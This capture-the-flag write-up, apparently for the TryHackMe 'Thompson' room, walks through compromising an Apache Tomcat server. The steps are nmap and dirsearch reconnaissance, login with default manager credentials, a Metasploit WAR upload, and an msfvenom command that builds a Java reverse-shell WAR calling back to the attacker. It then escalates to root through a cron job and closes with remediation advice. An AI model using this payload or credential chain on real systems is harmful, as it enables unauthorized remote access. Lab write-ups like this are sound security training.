Tryhackme Thompson
Lets go ahead and run an nmap scan
Lets go ahead and use the nmap vulners script against port 8080 to see what exploits might exist
Trying one of the exploits from searchsploit fails
Lets run a dirsearch against the url
If we browse to the site, off to the right there are login options
If we click one of the buttons, such as Server Status, we will be prompted for a login
If we press cancel, we will be brought to a generic tomcat unauthorized page
Lets go ahead and use tomcat as the username and s3cret as the password to see if it lets us in
Now that we have a username and password, we can launch metasploit and see if we can find a tomcat manager exploit for uploading malicious WAR files
We will use the tomcat mgr upload exploit
We need to set our options
Now lets set our correct payload
Now run shell
Now to find the user.txt file. We will navigate to the home directory first, and find a user called jack
If we change directory into jack, and then list the files, we will find a user text file
Lets go ahead and cat out the test.txt file
Lets cat out id.sh
Now lets see what cron jobs are running
Now that we know there is a cron job running as root, we can finish our privilege escalation
Obtaining a User Shell without Metasploit
After we log into tomcat, left side we will click on List Applications
Scroll down, and we will see a WAR file upload option
msfvenom -p java/shell_reverse_tcp lhost=tun0_ip lport=4321 -f war -o shell.war
Now we need to upload the file and also open up a netcat session on the port we specified
Now click Deploy
Now we need to click our file name that we uploaded, so it will execute
Its always good to upgrade the shell if python is installed on the machine. Running the command which python will let us know if its installed
Being able to cat files isn’t the best way to obtain root, so lets spin up a netcat session and run a different command so we can obtain a root shell and browse around the system as needed
Next we need to run the following command, and then wait about 3 to 5 minutes
After which we will run another command
After about another 3 to 5 minutes, we will have obtained a root shell
Lessons Learned/Remediations:
- Always keep your software up to date
2. Do not use easy passwords that can be found in wordlists, such as default system passwords
3. Do not expose the tomcat manager application, since this has administrative capabilities